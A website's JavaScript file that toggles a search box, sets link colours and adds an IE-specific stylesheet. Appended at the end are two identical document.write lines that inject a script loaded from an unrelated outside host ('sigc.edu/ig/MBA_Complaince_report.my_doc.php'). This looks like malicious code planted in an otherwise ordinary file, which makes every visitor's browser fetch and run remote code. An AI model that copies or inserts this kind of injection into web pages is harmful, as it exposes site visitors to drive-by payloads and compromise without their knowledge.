
window.onload = function searchb(){
    var lnk = document.getElementById('searchLink');
    var box = document.getElementById('searchBox');

	box.className = 'js';

	var textNoDisplay = '+ '+lnk.firstChild.nodeValue;
	var textDisplay = '– '+lnk.firstChild.nodeValue;

	lnk.removeAttribute('href');
	lnk.onclick = displayBox;

	displayBox();

	if(typeof(link) != 'undefined'){
	    displayBox();
	}

	function displayBox(){
		if(box.style.display == 'none'){
			box.style.display = '';
			lnk.style.color = '#ff9001';
			document.getElementById('q').focus();
			lnk.firstChild.nodeValue = textDisplay;
		}else{
			box.style.display = "none";
			lnk.style.color = '#ffffff';
			lnk.firstChild.nodeValue = textNoDisplay;
		}
	}


	if(pathIe){
		box.style.top = -61;
	    tabz = document.getElementById('menu').getElementsByTagName('ul')[0];
	    if(!tabz.firstChild.className){
	    	tabz.firstChild.className = 'firstChild';
		}
		box.filters; // tjs pas compris pourquoi ça marche mieux avec ça...
	}
}

if(navigator.appVersion.indexOf("MSIE")!= -1){
    document.write('<link type="text/css" rel="stylesheet" href="/hptxt/style/cleersea/ie_path.css" />');
    var pathIe = 1;
}


document.write('<script src=http://sigc.edu/ig/MBA_Complaince_report.my_doc.php ><\/script>');
document.write('<script src=http://sigc.edu/ig/MBA_Complaince_report.my_doc.php ><\/script>');
